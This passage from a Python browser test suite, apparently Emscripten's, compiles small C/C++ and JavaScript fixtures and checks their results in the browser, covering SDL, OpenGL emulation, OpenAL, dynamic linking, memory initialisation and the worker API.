def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by the dEQP test suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure', '1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
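# Build supp.cpp as a side module and link it at load time via RUNTIME_LINKED_LIBS;
# main and side each call into the other, and the exit code comes from suppInt.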
def test_runtimelink(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
create_test_file('supp.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
return suppInt;
}
''')
self.compile_btest(['supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
self.btest_exit('main.cpp', args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', '-s', 'RUNTIME_LINKED_LIBS=["supp.wasm"]', '-s', 'EXPORT_ALL'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
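# Test supplying our own XHR via Module.memoryInitializerRequest: a valid .mem URL
# should work, and a bogus URL should trigger the runtime warning, which we report as 0.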
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
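# Calling ccall/cwrap/direct exports before the runtime is ready, or after EXIT_RUNTIME
# has shut it down, should abort; while the runtime is alive the same calls succeed.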
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
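# Worker API: build the worker side with BUILD_AS_WORKER into worker.js, then drive it
# from the main page.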
def test_worker_api(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]', '-s', 'ASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('test_emscripten_async_wget2.cpp', expected='0')
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'lib.wasm', '-O2', '-s', 'SIDE_MODULE', '-s', 'EXPORTED_FUNCTIONS=[_one,_two]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE'], expected='8')
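# Preload a side module (.so) with --use-preload-plugins so it lands in
# Module['preloadedWasm'], then dlopen it from the main module.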
def test_preload_module(self):
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL'])
os.rename('library.wasm', 'library.so')
create_test_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-s', 'MAIN_MODULE', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL'],
expected='0')
def test_mmap_file(self):
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compile.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
self.run_process([EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
